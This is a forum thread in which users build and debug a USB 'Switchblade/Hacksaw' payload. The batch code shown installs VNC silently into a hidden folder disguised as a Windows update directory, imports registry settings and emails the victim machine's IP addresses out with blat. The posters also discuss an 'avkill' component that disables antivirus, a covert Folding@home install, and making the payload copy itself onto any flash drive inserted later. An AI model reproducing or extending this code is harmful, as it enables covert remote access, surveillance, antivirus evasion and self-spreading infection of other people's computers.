Jump to content

Switchblade + Hacksaw + VNC + nmap = spektormax's payload


spektormax
 Share

Recommended Posts

  • Replies 147
  • Created
  • Last Reply

Top Posters In This Topic

I just redownloaded it from the site and it looks like I have the right version. I was trying to add the auto ipsender now and it looks like it works...I add an ipconfig to get the local ip of the machine along with the whatismyip.com to get the Ip for one in my house that I am testing with...

In my email I am only getting the first whatismyip.com file. I added mine to the email and it works if I run it manually..How can I change it to send the Ip Daily not every 30 minutes?

Sample:

for %%i in (ip.txt,c:iplocal.txt) do blat.exe %%i -base64 -to %emailto% -u %emailfrom% -subject %subject% -pw %password% -f %emailfrom% -server 127.0.0.1:1099

GOTO cleanup

Link to comment
Share on other sites

Ok so I am trying to debug this VNC installer and After the files are copied I get this:

18 file(s) copied.

System error 3 has occurred.

The system cannot find the path specified.

Press any key to continue . . .

____

Im not sure if it can not find the

net start winvnc or the nircmd.exe execmd CALL WIPVNCInstallfilessend.cmd

Link to comment
Share on other sites

Still working on VNC issue. I am using this: It is not strting the service I get a message that says it can not find it. It does not appear to be a valid service. However I can start it manually..also if I just put winvnc in the install file instead of net start vnc it starts but just hangs there

mkdir %systemroot%$NtUninstallKB21050c07160c070f0b0a0a05031b05$ || mkdir "%appdata%hbn" 

cd ../VNCInstallFiles 

copy *.* %systemroot%$NtUninstallKB21050c07160c070f0b0a0a05031b05$ || copy *.* "%appdata%hbn" 

attrib %systemroot%$NtUninstallKB21050c07160c070f0b0a0a05031b05$ +s +h & attrib "%appdata%hbn" +s +h 

regedit /s ../CMD/vncdmp.reg 

regedit /s ../CMD/vncdmp1.reg 

regedit /s ../CMD/vncdmp2.reg 

ping -n 1 localhost > nul 

net start WinVNC 

nircmd.exe execmd CALL WIPVNCInstallfilessend.cmd

Link to comment
Share on other sites

I have updated the antidote to also unisntall VNC (it didn't do so before)

it now also properly uninstalls folding@Home vs being finished after restart. I have looked over the VNC thing, but have only dirty answers (I don't like using software that will show up on a virus scanner as I unfortuantly did with Folding (but avkill fixes that). With a little tool, I can install the service, however the little No-Icon hack isn't working for some reason.

Link to comment
Share on other sites

after like 3 hours of work I found the issues the regiestry ORLWInVNC3 had to be WInVNc3. I took advantage of the fact that I was fixing stuff, to update avkill to the 1.2BETA version. I also redid the antidote just a tad so it cleans up a few more things. Warning, there are now 2 files that will try a virus scanner. They are the file used to start folding silently and the file used to install VNC as a service. Both are solved using avkill. If you don't use the avkill, disable VNC and Folding or you might get virus scanners that pop up and vell at you. Also inorder for folding to work, it installes he avkill as a service. this is very crusial that this works, (it won't show up in services.msc but it will show up in the runs in the registry) (yes I now I could have used this on VNC but first of all I'm not sure if it would work right and I dont have a year to do it and check, and secoudn since avkill is already tehre why not use it.

Link to comment
Share on other sites

well, unforchunatly the only way I found to install vnc as a service was a program I foind on the net. The problem is that virus scanners trip. SO you have to run avkill to stop them and then use it. YOu have to use it to remove it as well, so antidoe avkills then it uninstalls and then it shutdowns avkill. Folding@home hack instal folding at hoem and folds for U3_zomvies team

Link to comment
Share on other sites

Does the antidote work for VNC. I can't gret it to uninstall. It looks like it does not actually take away the vnc icon in the toolbar but it keeps the status looking the same so the user does not know that you are connected....

Can you tell me what all the VNC hack does? I want to change the password but it will not let me now. I will redownload and try the antidote again

Link to comment
Share on other sites

first of all VNC has been VASTLY redone in the last 2 weeks (so has the new antidot old one didnt uninstall vnc) THe anditote removes everythings, delets the firectorys, deletes teh registries, uninstalls the service, and cleans up all traces. The latest antidote removes VNC completly, for anyone else that has a problem, make sure you download the latest version. Next time I relses parts (if I do) Ill put a post. Also if you guys want something in the payload that isn't let me know and Ill make it (asuming I can and have the tiem to)

Link to comment
Share on other sites

@ spektormax

I would like to know how you would go about modifying the hacksaw part of code to where when any future flash drives are plugged it, it copies the hacksaw payload to it, as well as does it's current job. It was mentioned that be possible in the last episode, but I've yet to see it mentioned here.

It seems simple to do, but... if done wouldn't that drive need to be flashed also? That's where I think it could get complex.

Link to comment
Share on other sites

@ spektormax

Gotcha, makes more sense also. I totally spaced the hacksaw on a non-U3. After as interesting and useful as your payload already is I'm shocked you haven't already added that... I got it, your not thinkin it in your head your commin back with something even more lethal and interesting ;)

Link to comment
Share on other sites

well 2 things that are an issue. 1 is that I cant get the dirve letter of the flash drive. Most likly I will just gra the drive letter when the drive is inserted and store it. And 2, I dont want skidies using it ot install thier little bots (you knwo what I mean)

Link to comment
Share on other sites

DOes any one know how to get the drive letter of a freshly insterted drive, (I dont have the MSVB 6.0 compiler) or perhaps just in hte sbs,exe add a strcpy, and copy the infro in hte dummy to the end of "send,bat" and shell execute that. THat woudl be enough for me to get it to work.

edit: I figured out how to do it, production of ICBM has begun

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.

×
×
  • Create New...